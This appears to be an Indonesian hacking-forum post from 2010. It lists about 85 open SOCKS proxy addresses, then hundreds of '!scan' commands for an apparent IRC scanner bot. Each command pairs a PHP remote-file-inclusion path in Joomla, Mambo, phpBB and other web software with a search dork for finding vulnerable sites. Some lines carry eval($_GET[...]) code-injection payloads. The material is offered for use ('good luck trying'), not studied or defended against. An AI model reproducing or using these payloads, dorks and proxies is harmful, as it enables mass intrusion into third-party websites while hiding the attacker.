16 123.236.251.135 1080 2010-08-21 16:51:06 2010-08-21 16:51:06
17 86.104.150.204 1080 2010-08-21 16:35:06 2010-08-21 16:35:06
18 211.83.105.167 1080 2010-08-21 14:42:08 2010-08-21 14:42:08
19 218.22.133.88 1080 2010-08-21 14:42:03 2010-06-03 12:36:11
20 174.36.27.75 1080 2010-08-21 07:33:02 2010-08-19 11:24:03
21 211.83.105.187 1080 2010-08-21 06:19:02 2010-08-21 06:19:02
22 60.29.60.58 1080 2010-08-21 06:18:05 2010-08-07 13:48:04
23 218.61.202.68 1080 2010-08-21 06:18:02 2010-08-20 22:11:03
24 218.61.202.64 1080 2010-08-21 06:18:02 2010-08-21 01:42:01
25 64.244.59.148 1080 2010-08-20 22:37:15 2010-06-02 16:30:04
26 219.91.171.187 1080 2010-08-20 07:49:03 2010-08-20 07:49:03
27 218.77.129.97 1080 2010-08-19 18:05:02 2009-12-24 16:11:01
28 68.1.90.129 1080 2010-08-19 10:37:06 2010-07-29 01:21:02
29 80.219.93.131 1080 2010-08-19 10:34:04 2010-07-20 11:24:11
30 221.115.75.69 1080 2010-08-19 09:22:24 2010-06-04 14:44:16
31 212.233.211.229 1080 2010-08-18 19:02:02 2010-08-18 19:02:02
32 125.76.227.130 1080 2010-08-18 18:45:17 2010-08-18 18:45:17
33 83.234.126.46 1080 2010-08-18 17:04:08 2010-07-15 15:03:39
34 59.108.61.20 1080 2010-08-18 16:01:02 2010-05-16 18:38:02
35 222.59.5.19 1080 2010-08-18 15:51:01 2010-06-12 10:16:01
36 65.15.241.134 1080 2010-08-18 11:24:01 2010-04-22 05:45:06
37 89.32.152.11 1080 2010-08-18 11:00:23 2010-08-18 10:52:02
38 60.10.60.30 1080 2010-08-17 20:39:02 2010-08-07 03:40:03
39 218.22.135.22 1080 2010-08-17 20:35:04 2010-08-17 17:23:02
40 222.73.238.116 1080 2010-08-17 20:07:01 2010-08-17 20:07:01
41 202.115.12.133 1080 2010-08-17 18:30:07 2010-08-17 18:30:07
42 123.7.31.96 1080 2010-08-17 17:13:03 2010-08-02 09:32:17
43 219.247.35.245 1080 2010-08-17 17:10:04 2010-08-17 17:10:04
44 194.0.79.10 1080 2010-08-17 17:10:03 2010-07-01 11:37:06
45 218.4.83.30 1080 2010-08-17 10:12:14 2010-07-28 03:44:08
46 125.78.8.5 1080 2010-08-17 05:38:05 2010-08-17 05:38:05
47 61.178.74.38 1080 2010-08-17 05:38:04 2010-07-16 08:00:16
48 221.224.29.101 1080 2010-08-16 01:25:08 2010-08-16 01:25:08
49 74.95.28.105 1080 2010-08-16 01:25:04 2010-08-03 13:30:09
50 121.231.175.177 1080 2010-08-15 16:11:08 2010-08-15 16:11:08
51 189.19.204.15 1080 2010-08-15 05:48:01 2010-07-07 15:36:04
52 125.106.95.8 1080 2010-08-15 01:02:01 2010-08-11 23:16:01
53 202.195.144.71 1080 2010-08-14 11:32:07 2010-08-14 11:32:07
54 122.5.185.235 1080 2010-08-14 09:25:02 2010-08-14 06:39:06
55 218.90.239.104 1080 2010-08-13 01:15:12 2010-08-13 01:15:12
56 218.22.16.187 1080 2010-08-12 19:31:13 2010-08-10 21:27:01
57 60.0.110.87 1080 2010-08-11 23:15:19 2010-08-11 23:15:19
58 109.86.108.180 1080 2010-08-11 21:02:10 2010-08-11 21:02:10
59 123.236.156.12 1080 2010-08-11 13:04:02 2010-08-11 13:04:02
60 123.236.177.19 1080 2010-08-10 17:44:05 2010-08-10 17:44:05
61 58.176.33.48 1080 2010-08-10 17:44:03 2010-06-27 17:22:07
62 93.175.204.26 1080 2010-08-10 04:28:31 2010-08-09 13:11:15
63 109.87.10.207 1080 2010-08-09 18:25:07 2010-06-01 18:05:12
64 201.6.146.2 1080 2010-08-09 15:54:13 2010-07-04 05:53:04
65 125.208.3.45 1080 2010-08-09 07:40:03 2010-07-01 12:28:14
66 109.86.214.238 1080 2010-08-09 00:47:02 2010-08-09 00:47:02
67 218.60.8.84 1080 2010-08-08 14:36:03 2010-08-02 03:32:13
68 58.214.4.6 1080 2010-08-08 10:02:08 2010-08-08 10:02:08
69 59.90.133.187 1080 2010-08-08 09:35:03 2010-08-07 17:37:04
70 59.2.219.126 1080 2010-08-07 07:42:12 2010-08-05 18:45:12
71 123.236.249.228 1080 2010-08-06 18:35:14 2010-08-06 18:35:14
72 61.83.18.236 1080 2010-08-06 14:58:04 2010-08-06 12:42:02
73 218.84.39.125 1080 2010-08-06 08:16:17 2010-08-03 07:29:02
74 211.154.133.74 1080 2010-08-05 23:53:14 2010-08-05 23:53:14
75 218.92.10.54 1080 2010-08-03 09:56:08 2010-08-02 09:35:13
76 115.108.244.12 1080 2010-08-02 20:30:20 2010-08-02 20:30:20
77 61.183.41.66 1080 2010-08-02 16:58:27 2010-07-03 22:14:25
78 67.21.82.40 1080 2010-07-31 23:52:01 2010-07-29 02:45:07
79 119.176.27.52 1080 2010-07-31 21:12:09 2010-07-31 19:36:04
80 174.129.84.133 1080 2010-07-31 11:30:11 2010-07-31 11:30:11
81 221.203.159.10 1080 2010-07-30 19:14:11 2010-07-30 19:14:11
82 59.93.71.181 1080 2010-07-30 16:49:13 2010-07-30 16:49:13
83 210.51.225.172 1080 2010-07-30 14:30:30 2010-07-30 14:30:30
84 59.40.182.234 1080 2010-07-30 13:03:15 2010-07-25 18:44:01
85 211.189.127.253 1080 2010-07-30 08:54:21 2010-07-30 08:54:21
86 202.207.215.40 1080 2010-07-29 18:57:03 2010-07-29 18:57:03
87 121.229.68.93 1080 2010-07-29 14:12:06 2010-07-22 14:38:20
88 79.134.5.115 1080 2010-07-28 15:38:03 2010-07-26 20:04:02
89 74.208.99.9 1080 2010-07-28 06:17:02 2010-07-28 06:17:02
90 208.53.183.249 1080 2010-07-28 05:29:06 2010-07-28 05:29:06
91 24.234.125.84 1080 2010-07-27 19:52:06 2010-07-26 20:46:02
92 218.108.7.114 1080 2010-07-24 22:05:14 2010-07-24 22:05:14
93 125.86.1.176 1080 2010-07-23 04:57:01 2010-07-23 04:57:01
94 76.229.244.234 1080 2010-07-22 19:39:03 2010-07-22 19:39:03
95 221.130.183.68 1080 2010-07-21 22:21:53 2010-07-21 22:21:53
96 59.95.176.149 1080 2010-07-21 15:10:07 2010-07-21 15:10:07
97 59.93.76.183 1080 2010-07-21 15:08:06 2010-07-21 15:08:06
98 221.203.132.133 1080 2010-07-21 11:33:11 2010-07-21 11:33:11
99 59.55.243.35 1080 2010-07-20 17:48:02 2010-07-20 11:23:11
100 220.170.147.118 1080 2010-07-20 01:51:01 2010-07-20 01:51:01

last time,selamat mencoba

bug dork terbaru senin 16 agustus 2010

!scan /chat_actions.php3?chat_phpIRC_path= "phpChat"

!scan /includes/fotools.php?imgs_path= "/fotools.php"

!scan /includes/fotools.php?imgs_path= "wa-boo"

!scan /library/class.backup.php?adminroot= "Direct News"

!scan /admin/menu_xml.php?rootpath= "Direct News"

!scan /admin/articles/edit.php?mainpath= "/edit.php"

!scan /admin/articles/edit.php?mainpath= "Faethon"

!scan /modules/dfss/lgsl/lgsl_players.php?lgsl_path= "/lgsl" "/lgsl"

!scan /modules/dfss/lgsl/lgsl_players.php?lgsl_path= "DaFun Spirit"

!scan ?id= "Projekt i realizacja: Euroadres"

!scan /components/com_moofaq/includes/file_includer.php?gzip=0&file= "component/option,com_moofaq"

!scan /index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path= component/option,com_content

!scan ?mosConfig.absolute.path= component/option,com_

!scan /index.php?option=com_remository&Itemid=&mosConfig.absolute.path= component/option,com_remository

!scan /index.php?option=com_wrapper&Itemid=&mosConfig.absolute.path= component/option,com_wrapper

!scan /index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path= component/option,com_sefservicemap

!scan /index.php?option=com_sef&Itemid=&mosConfig.absolute.path= component/option,com_sef

!scan /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path= component/option,com_fabrik

!scan /administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= "/universal"

!scan /administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= "/com_universal"

!scan /administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path= "jwmmxtd"

!scan /administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path= "/com_jwmmxtd"

!scan /languages/yourlanguage/definitions.php?include= "/yourlanguage"

!scan /languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= "/yourlanguage"

!scan /languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= "Vanilla"

!scan /languages/yourlanguage/definitions.php?include= "Vanilla"

!scan /core/dispatcher.php?configRootDir= "/dispatcher"

!scan /template/babyweb/index.php?template= "WebMaid"

!scan /templates/template.php?content= "NotSopureEdit"

!scan /templates/template.php?content= "/template.php"

!scan /templates/template.php?content= "/templates" "/templates"

!scan /template/wm025/footer.php?modules= "/wm025" "/wm025"

!scan /template/babyweb/index.php?template= "/babyweb" "/babyweb"

!scan /errors.php?error= "/typo3conf" "/typo3conf"

!scan /errors.php?error= "/typo" "/typo"

!scan /errors.php?error= "/typo3" "/typo3"

!scan /sweetrice/_plugin/subscriber/inc/post.php?root_dir= "/sweetrice" "/sweetrice"

!scan /content/themes/softsaurus_default/pages/subHeader.php?objects_path= "/softsaurus" "/softsaurus"

!scan /content/themes/softsaurus_default/pages/subHeader.php?objects_path= "/subHeader" "/subHeader"

!scan /content/plugins/wallpapers/wallpapers.php?includes_path= "/wallpapers" "/wallpapers"

!scan /include/mail.inc.php?root= "/mail.inc"

!scan /include/mail.inc.php?root= "Rezervi"

!scan /inc/bbcode.php?basePath= "deV!L`z Clanportal"

!scan /forum/adminLogin.php?config[forum_installed]= Login | Privacy | Terms of Use | Services | FAQ's | Articles | Affiliate | Invite a Friend | Feedback

!scan /forum/adminLogin.php?config[forum_installed]= "osDate" "osDate"

!scan /forum/adminLogin.php?config[forum_installed]= "/forum" "/forum"

!scan /forum/adminLogin.php?config[forum_installed]= "/adminLogin"

!scan /inc/config.php?basePath= "Clanportal"

!scan /inc/config.php?basePath= "/config.php"

!scan /system/database/DB_active_rec.php?BASEPATH= "/database" "/database"

!scan /ecrire.php?lang= "mcGuestbook"

!scan /ecrire.php?lang= "/ecrire.php"

!scan /external.php?url= "/external"

!scan /external.php?url= "/external.php?url="

!scan /includes/functions_common.php/modules/vwar/admin/admin.php?vwar_root= Powered by: Virtual War v1.5.0, Copyright © 2001 - 2004, vwar

!scan /filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]= "/filemanager"

!scan /filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]= "ispCP Omega"

!scan /filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]= "/skins" "/skins"

!scan /includes/tgpinc.php?DOCUMENT_ROOT= "/includes/tgpinc.php"

!scan /includes/tgpinc.php?DOCUMENT_ROOT= "Gnat-TGP" "Gnat-TGP"

!scan /includes/tgpinc.php?DOCUMENT_ROOT= "/tgpinc" "/tgpinc"

!scan /Wiky/include/WBmap.php?langFile= "/WBmap" "/WBmap"

!scan /Wiky/include/WBmap.php?langFile= "/Wiky" "/Wiky"

!scan /_center.php?page= "ProMan" "ProMan"

!scan /_center.php?page= "/index.php?page"

!scan /_center.php?page= "/_center.php"

!scan /errors.php?error= "/home.php?lng="

!scan /errors.php?error= "/home.php?language="

!scan /errors.php?error= "/home.php?id="

!scan /errors.php?error= "/home.php?to="

!scan /errors.php?error= "/home.php?go="

!scan /errors.php?error= "/home.php?lingua="

!scan /errors.php?error= "/home.php?pagina="

!scan /errors.php?error= "/home.php?page="

!scan /errors.php?error= "/home.php?pag="

!scan /errors.php?error= "/home.php?pg="

!scan /errors.php?error= "/home.php?p="

!scan /errors.php?error= "/home.php?act="

!scan /errors.php?error= "/home.php?pid="

!scan /errors.php?error= "/index.php?x="

!scan /errors.php?error= "/index.php?s="

!scan /errors.php?error= "/index.php?section="

!scan /errors.php?error= "/index.php?sel="

!scan /errors.php?error= "/index.php?go="

!scan /errors.php?error= "/index.php?include="

!scan /errors.php?error= "/index.php?admin="

!scan /errors.php?error= "/index.php?name="

!scan /errors.php?error= "/index.php?lng="

!scan /errors.php?error= "/index.php?language="

!scan /errors.php?error= "/index.php?id="

!scan /errors.php?error= "/index.php?to="

!scan /errors.php?error= "/index.php?go="

!scan /errors.php?error= "/index.php?pagina="

!scan /errors.php?error= "/index.php?page="

!scan /errors.php?error= "/index.php?pag="

!scan /errors.php?error= "/index.php?pg="

!scan /errors.php?error= "/index.php?p="

!scan /errors.php?error= "/index.php?act="

!scan /errors.php?error= "/index.php?pid="

!scan /home.php?page= "/home.php?page="

!scan /home.php?pag= "/home.php?pag="

!scan /home.php?pg= "/home.php?pg="

!scan /linkadmin.php?page= "/linkadmin.php"

!scan /nullpo/hsList.php?subdir= "/nullpo"

!scan /index.php?version= "/index.php?version="

!scan /board.php?code= "/board" "/board"

!scan /index.php?pid= "/index.php?pid="

!scan /index.php?opt= "/index.php?opt="

!scan /myevent.php?myevent_path= "/myevent.php"

!scan /Decoder.php?base_dir= "phpsyncml"

!scan /adm/krgourl.php?DOCUMENT_ROOT= "/adm" "/adm"

!scan /admin/modules/blocks.php?spaw_root= "/modules" "/modules"

!scan /rss_importer_functions.php?sitepath= "AdaptCMS" "AdaptCMS"

!scan /components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]= "/com_ezine" "/com_ezine"

!scan /admin/popup.php?popup= admin/popup.php

!scan /microcms/includes/file_manager/special.php?fm_includes_special= "MAXcms" "MAXcms"

!scan /CoupleDB.php?Parametre=0&DataDirectory= "PHPGenealogy" "PHPGenealogy"

!scan /libraries/database.php?path= "efront" "efront"

!scan /components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]= "/com_ajaxchat" "/com_ajaxchat"

!scan /administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path= "/com_booklibrary" "/com_booklibrary"

!scan /debugger.php?config_atkroot= "Achievo" "Achievo"

!scan /bulletin//skin/pqbig_board_blue/login.php?dir= "/skin" "/skin"

!scan /components/com_mamboman/mamboman.html.php?mosConfig_absolute_path= "/com_mamboman" "/com_mamboman"

!scan /biblioteca/bib_form.php?CLASSPATH= "FreeSchool"

!scan /biblioteca/bib_form.php?CLASSPATH= "/biblioteca"

!scan /plugins/address/admin/index.php?GLOBALS[config][dir][plugins]= "PHPope"

!scan /engine/api/api.class.php?dle_config_api= "DatalifeEngine"

!scan /engine/api/api.class.php?dle_config_api= "/api" "/api"

!scan /tools/send_reminders.php?noSet=0&includedir= "WebCalendar v1.1.0c-CVS"

!scan SSI.php?sourcedir= "/forum/index.php?sourcedir="

!scan /admin/common.inc.php?base_path= "pollphp" "textfile"

!scan /includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root= "/vwar"

!scan /index.php?page= "/index.php?page=faq"

!scan /index.php?sec= "/index.php?sec=faq"

!scan /components/com_moofaq/includes/file_includer.php?gzip=0&file= "/com_moofaq"

!scan /skin/ggambo7002_board/write.php?dir= "1999-2009 Zeroboard / skin by ggambo"

!scan ?APB_rp= "ApBoard"

!scan /includes/pear/Mail/RFC822.php?CONFIG[pear_dir]= "V-webmail"

!scan /forum/include/common.php?pun_root= "/forum"

!scan /dm-albums/template/album.php?SECURITY_FILE= "/dm-albums"

!scan /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript= "WordPress"

!scan /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path= "/com_fabrik" "/com_fabrik"

!scan /com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path= "/com_realestatemanager"

!scan /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path= "/com_vehiclemanager"

!scan /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path= "browse/category_id,2"

!scan /components/com_virtuemart/errors.php?error= "browse/category_id,2"

!scan /errors.php?error= "browse/category_id,2"

!scan /_theme/breadcrumb.php?rootBase= "! Hide Your Friends & Comments"

!scan /errors.php?error= "erstellt mit PHPKIT"
!scan es_custom_menu.php?files_dir= Weblogicnet
!scan components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path= "/com_virtuemart" "/com_virtuemart"
!scan /?_PHPLIB[libdir]= /?_PHPLIB[libdir]=
!scan ?INC= "If You lost password enter Your login:"
!scan /ckshop.php?incdir= "Payment options"
!scan /accounts/inc/errors.php?error= "Powered By: Merak Mail Server Software"
!scan ?_SERVER[DOCUMENT_ROOT]= "Powered by Bitrix Site Manager nulled by Nosferatu"
!scan ?dir[func]=&dir[base]= "ladder scripts"
!scan /errors.php?error= "/option,com"+"Joomla"
!scan /errors.php?error= "/option,com"+"Mambo"
!scan /errors.php?error= "/shop/index.php"
!scan /yacs/scripts/update_trailer.php?context[path_to_root]= "/yacs"
!scan errors.php?error= /ea-gBook /ea-gBook
!scan /ea-gBook/index_inc.php?inc_ordner= "/ea-gBook"
!scan appserv/main.php?appserv_root= "Index of /appserv"
!scan /includes/class_item.php?fileExtension= login.php?redirect=auction_details.php?auction_id=
!scan /include/footer.php?_path[counter]= RGBoard
!scan /latest/sirini_gallery_latest/list.php?path= GRBoard
!scan /include.php?grboard= GRBoard
!scan 179_squarebox_pds_list/view.php?theme= GRBoard
!scan /_conf/core/common-tpl-vars.php?confdir= PHPmyGallery
!scan ///////?cmd&file= "List Users with Pics only?"
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= "/snippets" "/snippets"
!scan //ray/modules/global/inc/header.inc.php?sIncPath= %22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22
!scan /include/scripts/export_batch.inc.php?DIR= "/ModernBill" "/ModernBill"
!scan calogic/clmcpreload.php?CLPATH= "/calogic"
!scan /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= kboard
!scan cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP= cowadmin
!scan /adminhead.php?path[docroot]= "/adminhead.php"
!scan /include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site= "phpkit"
!scan ?custompluginfile[]= index.php?categoryid=5
!scan ?custompluginfile[]= index.php?categoryid=10
!scan ?custompluginfile[]= index.php?categoryid=15
!scan index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22
!scan /tiny_includes/config.php?dir_ws= "/tiny_includes"
!scan /index.php?file_op= "RPortal"
!scan /common/theme/default/header_setup.php?path[docroot]= "Events Calendar"
!scan cmpro_header.inc.php?sitepath= "cmpro.ext"
!scan errors.php?error= "Miro International Pty Ltd."
!scan ?REX[INCLUDE_PATH]= "redaxo"
!scan /?view=page&pagename= /?view=selectcity&targetview=1
!scan /coast/header.php?sections_file= "/coast"
!scan errors.php?error= "/barcodegen"
!scan /class/LSTable.php?class_dir= "/barcodegen"
!scan /mwchat/libs/errors.php?error= "/mwchat"
!scan /modules/mods_full/shopping_cart/includes/errors.php?error= "/shopping_cart"
!scan /modules/My_eGallery/errors.php?error= "/My_eGallery"
!scan /tools/errors.php?error= "includes/php-dbi.php"
!scan /includes/mailaccess/errors.php?error= "/mailaccess"
!scan /include/monitoring/engine/errors.php?error= "MakeXML4statusCounter"
!scan /ecommerce/payment/errors.php?error= "/ecommerce"
!scan /mambots/content/multithumb/errors.php?error= "/content/multithumb"
!scan /frame.php?framefile= "/frame.php"
!scan /frame.php?framefile= "Ol Bookmarks Manager"
!scan errors.php?error= "/extcalendar" "/extcalendar"
!scan includes/session.php?baseDir= "Version 2.0.4 "You must have cookies enabled in your browser"
!scan errors.php?error= "/com_philaform" "/com_philaform"
!scan /_theme/breadcrumb.php?rootBase= "! Hide Your Friends & Comments"
!scan /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]= "CMS Contenido"
!scan include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site= "Diese Webseite wurde mit PHPKIT Version 1.6.1 erstellt"
!scan index.php?ac= "index.php?ac="
!scan index.php?mod= "index.php?mod="
!scan /includes/function_core.php?web_root= "This search engine is in no way intended for illegal downloads."
!scan /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= "/skin_shop"
!scan contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]= cms/front_content
!scan /modules/Forums/admin/admin_users.php?phpbb_root_path= "%22PHP-Nuke+Port+by+Tom+Nitzschner%22"
!scan /page.php?id= "/page.php?id="
!scan /modules/Forums/admin/errors.php?error= "modules.php?name="
!scan /poll/poll_ssi.php?include_path= "poll_ssi.php"

bugs dork 2010 baru

!scan /include/html/config.php?DIR= "/modernbill"
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= /MODx/
!scan /include/scripts/export_batch.inc.php?DIR= ModernBill
!scan /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= technote7
!scan /?sIncPath= "BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More."
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement - © 2002-2004 by Christian Scheb - Stylemotion.de
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement
!scan ?custompluginfile[]= index.php?categoryid=5
!scan ?custompluginfile[]= index.php?categoryid=10
!scan ?custompluginfile[]= index.php?categoryid=15
!scan index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement - © 2002-2004 by Christian Scheb - Stylemotion.de
!scan /?installed_config_file= "PhpJobScheduler"
!scan /pjsfiles/modify.php?installed_config_file= "PhpJobScheduler"
!scan errors.php?error= "/com_rwcards" "/com_rwcards"
!scan //vwar/backup/errors.php?error= "errors.php"
!scan /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= "powered by CMS Made Simple version"
!scan /s_loadenv.inc.php?DOCUMENT_ROOT= "netcat require"
!scan /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= "php?option=com_rwcards" "php?option=com_rwcards"
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums"
!scan phphtml.php?htmlclass_path= "phphtml.php"
!scan lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= "/adodb_lite" "/adodb_lite"
!scan /?path%5Bdocroot%5D= "/newspublish" "/newspublish"
!scan /?sIncPath= %22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22
!scan errors.php?error= "netcat_files"
!scan /index.php?DOCUMENT_ROOT= "netcat_files"
!scan errors.php?error= %22Home%22+%22%7C%22+%22Sell+an+item%22+%22%7C%22+%22Register+now%22+%22%7C%22+%22Login%22+%22%7C%22+%22Help%22+%22%7C%22+%22About+Us%22+%22%7C%22+%22Terms+%26+Conditions%22
!scan /?prefix= %22Home%22+%22%7C%22+%22Sell+an+item%22+%22%7C%22+%22Register+now%22+%22%7C%22+%22Login%22+%22%7C%22+%22Help%22+%22%7C%22+%22About+Us%22+%22%7C%22+%22Terms+%26+Conditions%22
!scan ?sIncPath= "powered by boonex"
!scan plugins/safehtml/HTMLSax3.php?dir[plugins]= "powered by boonex"
!scan errors.php?error= "powered by boonex"
!scan include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]= "powered by boonex"
!scan errors.php?error= "/ray.3.5" "/ray.3.5"
!scan ?sourcedir= index.php?sourcedir=
!scan errors.php?error= "/com_ponygallery"
!scan /?page= /?pagedb=?
!scan hw3.php?daysonly=0).include($_GET[file]).(0&file= "Current Conditions" "Sun & Moon Information"
!scan /?page= "ArticleBeach"
!scan /tools/send_reminders.php?noSet=0&includedir= includes/php-dbi.php
!scan /Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]= "Powered by Orca Interactive Forum Script"
!scan errors.php?error= "Powered by Orca Interactive Forum Script"
!scan /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= "/sohoadmin/"
!scan /?include_path= "guestbook"
!scan /?include_path= "action"+"poll_ident"
!scan /admin/include/lib.module.php?mod_root= "/cmsworks"
!scan errors.php?error= "/com_extcalendar"
!scan /admin/templates/template_thumbnail.php?thumb_template= "Powered by HomePH Design"
!scan /includes/header.php?c_temp_path= "/header.php"
!scan /include/admin.lib.inc.php?site_path= "include/lib.inc.php"
!scan src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT= "/resource/categories"
!scan errors.php?error= "phpkit" "phpkit"
!scan errors.php?error= "/contenido/includes"
!scan popup.php?path= "phpkit" "phpkit"
!scan /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]= "/contenido/includes"
!scan include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]= "/plugins/jrBrowser/"
!scan /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file= /weather/hw3.php/
!scan /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path= "com_pollxt"
!scan /ktmllite/includes/ktedit/toolbar.php?dirDepth= "ktmllite" "ktmllite"
!scan errors.php?error= "Subdreamer"
!scan //?custompluginfile%5B%5D= Created by Subdreamer CMS
!scan lostpasswd.php?env[include_prefix]= bookmark4u
!scan /poll/png.php?include_path= "action"+"poll_ident"
!scan /inc/formmail.inc.php?script_root= "Powered By Form Mail Script"
!scan /phpAdsNew/view.inc.php?phpAds_path= "Copyright 2000-2002, PHPAUCTION.ORG"
!scan /authentication/errors.php?error= "phpbb3"
!scan /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]= /phpbb3/
!scan errors.php?error= "phpRaider"
!scan /poll/booth.php?include_path= "action"+"poll_ident"
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "index.php%3Fpr%3D+site%3Anet"
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "index.php%3Fpr%3D+site%3Aorg"
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "index.php%3Fpr%3D+site%3Aus"
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "index.php%3Fpr%3D+site%3Aru"
!scan amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= 12%22If+you+are+a+registered+member%2C+please+login.+If+you+are+not+registered+yet%2C+please+signup.%22
!scan /admin.php?include_path= "Total Records:" "HTML code is" "guestbook"
!scan /guestbook1//admin.php?include_path= "guestbook1"
!scan poll/booth.php?include_path= "Advanced Poll"
!scan index.php?url= index.php?url=
!scan /galeria.php?start=0&kategoria= /galeria.php?start=0&kategoria=
!scan home.php?index= "home.php?index="
!scan head.php?adresa= head.php?
!scan /poll/png.php?include_path= extcalendar
!scan /includes/db_adodb.php?baseDir= "dotProject logo"
!scan index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid= allinurl: aid "com_xfaq"
!scan /jscript.php?my_ms[root]= intitle:"myspeach" "chat_exemple.php"
!scan includes/stats.inc.php?prefix= browse.php%3Fid%3D site:com
!scan components/com_sitemap/sitemap.php?mosConfig_admin_path= /component/option,com_sitemap/
!scan /component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_= "Powered by Mambo"
!scan includes/useragent.inc.php?prefix= "/browse.php?id="
!scan docs/front-end-demo/cart2.php?workdir= %22hosting.php?pt=r%22 site:au
!scan /include/lib.inc.php?site_path= "lib.inc.php"
!scan /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]= "Joomla Component mosDirectory"
!scan /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path= "/includes/joomla.php"
!scan /guestbook/errors.php?error= "Guestbook - Administration"
!scan /index.php?page= index.php%"Submit%Articles"%"Member%Login"%"Top%Authors"
!scan errors.php?error= "powered by TalkBack"
!scan /components/errors.php?error= "com_simpleboard"
!scan /modules/errors.php?error= "/includes/mambo.php"
!scan /errors.php?error= "Joomla Visites"
!scan /modules/Forums/admin/errors.php?error= com_gallery
!scan /include/bbs.lib.inc.php?site_path= "/rgboard/"
!scan /ch_readalso.php?read_xml_include= "Copyrights © 2005 Belgische Federale Overheidsdiensten"
!scan /txt-db-api/txt-db-api.php?API_HOME_DIR= "powered by Crafty Syntax Live Help 2.7"
!scan /dotproject//includes/db_connect.php?baseDir= "dotproject"
!scan modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE= modules/dungeon
!scan /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path= "com_letterman"
!scan /index.php?config=1&base_datapath= wmview.php
!scan errors.php?error= "index"+"of/"+"errors.php"
!scan /accounts/inc/include.php?language=0&lang_settings[0][1]= "powered by Icewarp"
!scan /include/write.php?dir= "/write.php?dir="
!scan /errors.php?error= /errors.php?error=
!scan /components/com_flyspray/startdown.php?file= "/com_flyspray"
!scan /modules/xfsection/modify.php?dir_module= "xfsection" "xfsection"
